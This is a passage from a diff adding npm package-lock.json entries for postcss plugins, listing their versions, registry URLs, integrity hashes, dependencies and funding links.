"postcss": "^8.2.15" + } + }, + "node_modules/postcss-discard-duplicates": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-discard-duplicates/-/postcss-discard-duplicates-6.0.0.tgz", + "integrity": "sha512-bU1SXIizMLtDW4oSsi5C/xHKbhLlhek/0/yCnoMQany9k3nPBq+Ctsv/9oMmyqbR96HYHxZcHyK2HR5P/mqoGA==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-discard-empty": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-discard-empty/-/postcss-discard-empty-6.0.0.tgz", + "integrity": "sha512-b+h1S1VT6dNhpcg+LpyiUrdnEZfICF0my7HAKgJixJLW7BnNmpRH34+uw/etf5AhOlIhIAuXApSzzDzMI9K/gQ==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-discard-overridden": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-discard-overridden/-/postcss-discard-overridden-6.0.0.tgz", + "integrity": "sha512-4VELwssYXDFigPYAZ8vL4yX4mUepF/oCBeeIT4OXsJPYOtvJumyz9WflmJWTfDwCUcpDR+z0zvCWBXgTx35SVw==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-double-position-gradients": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/postcss-double-position-gradients/-/postcss-double-position-gradients-4.0.4.tgz", + "integrity": "sha512-nUAbUXURemLXIrl4Xoia2tiu5z/n8sY+BVDZApoeT9BlpByyrp02P/lFCRrRvZ/zrGRE+MOGLhk8o7VcMCtPtQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/postcss-progressive-custom-properties": "^2.3.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-focus-visible": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/postcss-focus-visible/-/postcss-focus-visible-8.0.2.tgz", + "integrity": "sha512-f/Vd+EC/GaKElknU59esVcRYr/Y3t1ZAQyL4u2xSOgkDy4bMCmG7VP5cGvj3+BTLNE9ETfEuz2nnt4qkZwTTeA==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-focus-within": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/postcss-focus-within/-/postcss-focus-within-7.0.2.tgz", + "integrity": "sha512-AHAJ89UQBcqBvFgQJE9XasGuwMNkKsGj4D/f9Uk60jFmEBHpAL14DrnSk3Rj+SwZTr/WUG+mh+Rvf8fid/346w==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-font-variant": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/postcss-font-variant/-/postcss-font-variant-5.0.0.tgz", + "integrity": "sha512-1fmkBaCALD72CK2a9i468mA/+tr9/1cBxRRMXOUaZqO43oWPR5imcyPjXwuv7PXbCid4ndlP5zWhidQVVa3hmA==", + "dev": true, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/postcss-gap-properties": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/postcss-gap-properties/-/postcss-gap-properties-4.0.1.tgz", + "integrity": "sha512-V5OuQGw4lBumPlwHWk/PRfMKjaq/LTGR4WDTemIMCaMevArVfCCA9wBJiL1VjDAd+rzuCIlkRoRvDsSiAaZ4Fg==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-image-set-function": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/postcss-image-set-function/-/postcss-image-set-function-5.0.2.tgz", + "integrity": "sha512-Sszjwo0ubETX0Fi5MvpYzsONwrsjeabjMoc5YqHvURFItXgIu3HdCjcVuVKGMPGzKRhgaknmdM5uVWInWPJmeg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-import": { + "version": "15.1.0", + "resolved": "https://registry.npmjs.org/postcss-import/-/postcss-import-15.1.0.tgz", + "integrity": "sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.0.0", + "read-cache": "^1.0.0", + "resolve": "^1.1.7" + }, + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "postcss": "^8.0.0" + } + }, + "node_modules/postcss-initial": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/postcss-initial/-/postcss-initial-4.0.1.tgz", + "integrity": "sha512-0ueD7rPqX8Pn1xJIjay0AZeIuDoF+V+VvMt/uOnn+4ezUKhZM/NokDeP6DwMNyIoYByuN/94IQnt5FEkaN59xQ==", + "dev": true, + "peerDependencies": { + "postcss": "^8.0.0" + } + }, + "node_modules/postcss-lab-function": { + "version": "5.2.3", + "resolved": "https://registry.npmjs.org/postcss-lab-function/-/postcss-lab-function-5.2.3.tgz", + "integrity": "sha512-fi32AYKzji5/rvgxo5zXHFvAYBw0u0OzELbeCNjEZVLUir18Oj+9RmNphtM8QdLUaUnrfx8zy8vVYLmFLkdmrQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/css-color-parser": "^1.2.0", + "@csstools/css-parser-algorithms": "^2.1.1", + "@csstools/css-tokenizer": "^2.1.1", + "@csstools/postcss-progressive-custom-properties": "^2.3.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-loader": { + "version": "7.3.3", + "resolved": "https://registry.npmjs.org/postcss-loader/-/postcss-loader-7.3.3.tgz", + "integrity": "sha512-YgO/yhtevGO/vJePCQmTxiaEwER94LABZN0ZMT4A0vsak9TpO+RvKRs7EmJ8peIlB9xfXCsS7M8LjqncsUZ5HA==", + "dev": true, + "dependencies": { + "cosmiconfig": "^8.2.0", + "jiti": "^1.18.2", + "semver": "^7.3.8" + }, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "postcss": "^7.0.0 || ^8.0.1", + "webpack": "^5.0.0" + } + }, + "node_modules/postcss-loader/node_modules/cosmiconfig": { + "version": "8.3.6", + "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-8.3.6.tgz", + "integrity": "sha512-kcZ6+W5QzcJ3P1Mt+83OUv/oHFqZHIx8DuxG6eZ5RGMERoLqp4BuGjhHLYGK+Kf5XVkQvqBSmAy/nGWN3qDgEA==", + "dev": true, + "dependencies": { + "import-fresh": "^3.3.0", + "js-yaml": "^4.1.0", + "parse-json": "^5.2.0", + "path-type": "^4.0.0" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/d-fischer" + }, + "peerDependencies": { + "typescript": ">=4.9.5" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/postcss-loader/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/postcss-loader/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/postcss-loader/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/postcss-logical": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/postcss-logical/-/postcss-logical-6.2.0.tgz", + "integrity": "sha512-aqlfKGaY0nnbgI9jwUikp4gJKBqcH5noU/EdnIVceghaaDPYhZuyJVxlvWNy55tlTG5tunRKCTAX9yljLiFgmw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-media-query-parser": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/postcss-media-query-parser/-/postcss-media-query-parser-0.2.3.tgz", + "integrity": "sha512-3sOlxmbKcSHMjlUXQZKQ06jOswE7oVkXPxmZdoB1r5l0q6gTFTQSHxNxOrCccElbW7dxNytifNEo8qidX2Vsig==", + "dev": true + }, + "node_modules/postcss-merge-longhand": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-merge-longhand/-/postcss-merge-longhand-6.0.0.tgz", + "integrity": "sha512-4VSfd1lvGkLTLYcxFuISDtWUfFS4zXe0FpF149AyziftPFQIWxjvFSKhA4MIxMe4XM3yTDgQMbSNgzIVxChbIg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0", + "stylehacks": "^6.0.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-merge-rules": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/postcss-merge-rules/-/postcss-merge-rules-6.0.1.tgz", + "integrity": "sha512-a4tlmJIQo9SCjcfiCcCMg/ZCEe0XTkl/xK0XHBs955GWg9xDX3NwP9pwZ78QUOWB8/0XCjZeJn98Dae0zg6AAw==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "caniuse-api": "^3.0.0", + "cssnano-utils": "^4.0.0", + "postcss-selector-parser": "^6.0.5" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-minify-font-values": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-minify-font-values/-/postcss-minify-font-values-6.0.0.tgz", + "integrity": "sha512-zNRAVtyh5E8ndZEYXA4WS8ZYsAp798HiIQ1V2UF/C/munLp2r1UGHwf1+6JFu7hdEhJFN+W1WJQKBrtjhFgEnA==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-minify-gradients": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-minify-gradients/-/postcss-minify-gradients-6.0.0.tgz", + "integrity": "sha512-wO0F6YfVAR+K1xVxF53ueZJza3L+R3E6cp0VwuXJQejnNUH0DjcAFe3JEBeTY1dLwGa0NlDWueCA1VlEfiKgAA==", + "dev": true, + "dependencies": { + "colord": "^2.9.1", + "cssnano-utils": "^4.0.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-minify-params": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-minify-params/-/postcss-minify-params-6.0.0.tgz", + "integrity": "sha512-Fz/wMQDveiS0n5JPcvsMeyNXOIMrwF88n7196puSuQSWSa+/Ofc1gDOSY2xi8+A4PqB5dlYCKk/WfqKqsI+ReQ==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "cssnano-utils": "^4.0.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-minify-selectors": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-minify-selectors/-/postcss-minify-selectors-6.0.0.tgz", + "integrity": "sha512-ec/q9JNCOC2CRDNnypipGfOhbYPuUkewGwLnbv6omue/PSASbHSU7s6uSQ0tcFRVv731oMIx8k0SP4ZX6be/0g==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.5" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-modules-local-by-default": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/postcss-modules-local-by-default/-/postcss-modules-local-by-default-4.0.3.tgz", + "integrity": "sha512-2/u2zraspoACtrbFRnTijMiQtb4GW4BvatjaG/bCjYQo8kLTdevCUlwuBHx2sCnSyrI3x3qj4ZK1j5LQBgzmwA==", + "dev": true, + "dependencies": { + "icss-utils": "^5.0.0", + "postcss-selector-parser": "^6.0.2", + "postcss-value-parser": "^4.1.0" + }, + "engines": { + "node": "^10 || ^12 || >= 14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/postcss-nesting": { + "version": "11.3.0", + "resolved": "https://registry.npmjs.org/postcss-nesting/-/postcss-nesting-11.3.0.tgz", + "integrity": "sha512-JlS10AQm/RzyrUGgl5irVkAlZYTJ99mNueUl+Qab+TcHhVedLiylWVkKBhRale+rS9yWIJK48JVzQlq3LcSdeA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/selector-specificity": "^2.0.0", + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-normalize-charset": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-charset/-/postcss-normalize-charset-6.0.0.tgz", + "integrity": "sha512-cqundwChbu8yO/gSWkuFDmKrCZ2vJzDAocheT2JTd0sFNA4HMGoKMfbk2B+J0OmO0t5GUkiAkSM5yF2rSLUjgQ==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-display-values": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-display-values/-/postcss-normalize-display-values-6.0.0.tgz", + "integrity": "sha512-Qyt5kMrvy7dJRO3OjF7zkotGfuYALETZE+4lk66sziWSPzlBEt7FrUshV6VLECkI4EN8Z863O6Nci4NXQGNzYw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-positions": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-positions/-/postcss-normalize-positions-6.0.0.tgz", + "integrity": "sha512-mPCzhSV8+30FZyWhxi6UoVRYd3ZBJgTRly4hOkaSifo0H+pjDYcii/aVT4YE6QpOil15a5uiv6ftnY3rm0igPg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-repeat-style": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-repeat-style/-/postcss-normalize-repeat-style-6.0.0.tgz", + "integrity": "sha512-50W5JWEBiOOAez2AKBh4kRFm2uhrT3O1Uwdxz7k24aKtbD83vqmcVG7zoIwo6xI2FZ/HDlbrCopXhLeTpQib1A==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-string": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-string/-/postcss-normalize-string-6.0.0.tgz", + "integrity": "sha512-KWkIB7TrPOiqb8ZZz6homet2KWKJwIlysF5ICPZrXAylGe2hzX/HSf4NTX2rRPJMAtlRsj/yfkrWGavFuB+c0w==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-timing-functions": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-timing-functions/-/postcss-normalize-timing-functions-6.0.0.tgz", + "integrity": "sha512-tpIXWciXBp5CiFs8sem90IWlw76FV4oi6QEWfQwyeREVwUy39VSeSqjAT7X0Qw650yAimYW5gkl2Gd871N5SQg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-unicode": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-unicode/-/postcss-normalize-unicode-6.0.0.tgz", + "integrity": "sha512-ui5crYkb5ubEUDugDc786L/Me+DXp2dLg3fVJbqyAl0VPkAeALyAijF2zOsnZyaS1HyfPuMH0DwyY18VMFVNkg==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-url": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-url/-/postcss-normalize-url-6.0.0.tgz", + "integrity": "sha512-98mvh2QzIPbb02YDIrYvAg4OUzGH7s1ZgHlD3fIdTHLgPLRpv1ZTKJDnSAKr4Rt21ZQFzwhGMXxpXlfrUBKFHw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-whitespace": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-whitespace/-/postcss-normalize-whitespace-6.0.0.tgz", + "integrity": "sha512-7cfE1AyLiK0+ZBG6FmLziJzqQCpTQY+8XjMhMAz8WSBSCsCNNUKujgIgjCAmDT3cJ+3zjTXFkoD15ZPsckArVw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-opacity-percentage": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/postcss-opacity-percentage/-/postcss-opacity-percentage-2.0.0.tgz", + "integrity": "sha512-lyDrCOtntq5Y1JZpBFzIWm2wG9kbEdujpNt4NLannF+J9c8CgFIzPa80YQfdza+Y+yFfzbYj/rfoOsYsooUWTQ==", + "dev": true, + "funding": [ + { + "type": "kofi", + "url": "https://ko-fi.com/mrcgrtz" + }, + { + "type": "liberapay", + "url": "https://liberapay.com/mrcgrtz" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.2" + } + }, + "node_modules/postcss-ordered-values": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-ordered-values/-/postcss-ordered-values-6.0.0.tgz", + "integrity": "sha512-K36XzUDpvfG/nWkjs6d1hRBydeIxGpKS2+n+ywlKPzx1nMYDYpoGbcjhj5AwVYJK1qV2/SDoDEnHzlPD6s3nMg==", + "dev": true, + "dependencies": { + "cssnano-utils": "^4.0.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-overflow-shorthand": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/postcss-overflow-shorthand/-/postcss-overflow-shorthand-4.0.1.tgz", + "integrity": "sha512-HQZ0qi/9iSYHW4w3ogNqVNr2J49DHJAl7r8O2p0Meip38jsdnRPgiDW7r/LlLrrMBMe3KHkvNtAV2UmRVxzLIg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-page-break": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/postcss-page-break/-/postcss-page-break-3.0.4.tgz", + "integrity": "sha512-1JGu8oCjVXLa9q9rFTo4MbeeA5FMe00/9C7lN4va606Rdb+HkxXtXsmEDrIraQ11fGz/WvKWa8gMuCKkrXpTsQ==", + "dev": true, + "peerDependencies": { + "postcss": "^8" + } + }, + "node_modules/postcss-place": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/postcss-place/-/postcss-place-8.0.1.tgz", + "integrity": "sha512-Ow2LedN8sL4pq8ubukO77phSVt4QyCm35ZGCYXKvRFayAwcpgB0sjNJglDoTuRdUL32q/ZC1VkPBo0AOEr4Uiw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-preset-env": { + "version": "8.5.1", + "resolved": "https://registry.npmjs.org/postcss-preset-env/-/postcss-preset-env-8.5.1.tgz", + "integrity": "sha512-qhWnJJjP6ArLUINWJ38t6Aftxnv9NW6cXK0NuwcLCcRilbuw72dSFLkCVUJeCfHGgJiKzX+pnhkGiki0PEynWg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/postcss-cascade-layers": "^3.0.1", + "@csstools/postcss-color-function": "^2.2.3", + "@csstools/postcss-color-mix-function": "^1.0.3", + "@csstools/postcss-font-format-keywords": "^2.0.2", + "@csstools/postcss-gradients-interpolation-method": "^3.0.6", + "@csstools/postcss-hwb-function": "^2.2.2", + "@csstools/postcss-ic-unit": "^2.0.4", + "@csstools/postcss-is-pseudo-class": "^3.2.1", + "@csstools/postcss-logical-float-and-clear": "^1.0.1", + "@csstools/postcss-logical-resize": "^1.0.1", + "@csstools/postcss-logical-viewport-units": "^1.0.3", + "@csstools/postcss-media-minmax": "^1.0.4", + "@csstools/postcss-media-queries-aspect-ratio-number-values": "^1.0.4", + "@csstools/postcss-nested-calc": "^2.0.2", + "@csstools/postcss-normalize-display-values": "^2.0.1", + "@csstools/postcss-oklab-function": "^2.2.3", + "@csstools/postcss-progressive-custom-properties": "^2.3.0", + "@csstools/postcss-relative-color-syntax": "^1.0.2", + "@csstools/postcss-scope-pseudo-class": "^2.0.2", + "@csstools/postcss-stepped-value-functions": "^2.1.1", + "@csstools/postcss-text-decoration-shorthand": "^2.2.4", + "@csstools/postcss-trigonometric-functions": "^2.1.1", + "@csstools/postcss-unset-value": "^2.0.1", + "autoprefixer": "^10.4.14", + "browserslist": "^4.21.9", + "css-blank-pseudo": "^5.0.2", + "css-has-pseudo": "^5.0.2", + "css-prefers-color-scheme": "^8.0.2", + "cssdb": "^7.6.0", + "postcss-attribute-case-insensitive": "^6.0.2", + "postcss-clamp": "^4.1.0", + "postcss-color-functional-notation": "^5.1.0", + "postcss-color-hex-alpha": "^9.0.2", + "postcss-color-rebeccapurple": "^8.0.2", + "postcss-custom-media": "^9.1.5", + "postcss-custom-properties": "^13.2.0", + "postcss-custom-selectors": "^7.1.3", + "postcss-dir-pseudo-class": "^7.0.2", + "postcss-double-position-gradients": "^4.0.4", + "postcss-focus-visible": "^8.0.2", + "postcss-focus-within": "^7.0.2", + "postcss-font-variant": "^5.0.0", + "postcss-gap-properties": "^4.0.1", + "postcss-image-set-function": "^5.0.2", + "postcss-initial": "^4.0.1", + "postcss-lab-function": "^5.2.3", + "postcss-logical": "^6.2.0", + "postcss-nesting": "^11.3.0", + "postcss-opacity-percentage": "^2.0.0", + "postcss-overflow-shorthand": "^4.0.1", + "postcss-page-break": "^3.0.4", + "postcss-place": "^8.0.1", + "postcss-pseudo-class-any-link": "^8.0.2", + "postcss-replace-overflow-wrap": "^4.0.0", + "postcss-selector-not": "^7.0.1", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-pseudo-class-any-link": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/postcss-pseudo-class-any-link/-/postcss-pseudo-class-any-link-8.0.2.tgz", + "integrity": "sha512-FYTIuRE07jZ2CW8POvctRgArQJ43yxhr5vLmImdKUvjFCkR09kh8pIdlCwdx/jbFm7MiW4QP58L4oOUv3grQYA==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-reduce-initial": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-reduce-initial/-/postcss-reduce-initial-6.0.0.tgz", + "integrity": "sha512-s2UOnidpVuXu6JiiI5U+fV2jamAw5YNA9Fdi/GRK0zLDLCfXmSGqQtzpUPtfN66RtCbb9fFHoyZdQaxOB3WxVA==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "caniuse-api": "^3.0.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-reduce-transforms": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-reduce-transforms/-/postcss-reduce-transforms-6.0.0.tgz", + "integrity": "sha512-FQ9f6xM1homnuy1wLe9lP1wujzxnwt1EwiigtWwuyf8FsqqXUDUp2Ulxf9A5yjlUOTdCJO6lonYjg1mgqIIi2w==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-replace-overflow-wrap": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/postcss-replace-overflow-wrap/-/postcss-replace-overflow-wrap-4.0.0.tgz", + "integrity": "sha512-KmF7SBPphT4gPPcKZc7aDkweHiKEEO8cla/GjcBK+ckKxiZslIu3C4GCRW3DNfL0o7yW7kMQu9xlZ1kXRXLXtw==", + "dev": true, + "peerDependencies": { + "postcss": "^8.0.3" + } + }, + "node_modules/postcss-reporter": { + "version": "7.0.5", + "resolved": "https://registry.npmjs.org/postcss-reporter/-/postcss-reporter-7.0.5.tgz", + "integrity": "sha512-glWg7VZBilooZGOFPhN9msJ3FQs19Hie7l5a/eE6WglzYqVeH3ong3ShFcp9kDWJT1g2Y/wd59cocf9XxBtkWA==", + "dev": true, + "dependencies": { + "picocolors": "^1.0.0", + "thenby": "^1.3.4" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/postcss-resolve-nested-selector": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/postcss-resolve-nested-selector/-/postcss-resolve-nested-selector-0.1.1.tgz", + "integrity": "sha512-HvExULSwLqHLgUy1rl3ANIqCsvMS0WHss2UOsXhXnQaZ9VCc2oBvIpXrl00IUFT5ZDITME0o6oiXeiHr2SAIfw==", + "dev": true + }, + "node_modules/postcss-safe-parser": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/postcss-safe-parser/-/postcss-safe-parser-7.0.0.tgz", + "integrity": "sha512-ovehqRNVCpuFzbXoTb4qLtyzK3xn3t/CUBxOs8LsnQjQrShaB4lKiHoVqY8ANaC0hBMHq5QVWk77rwGklFUDrg==", + "dev": true, + "funding": [ + { + "type": 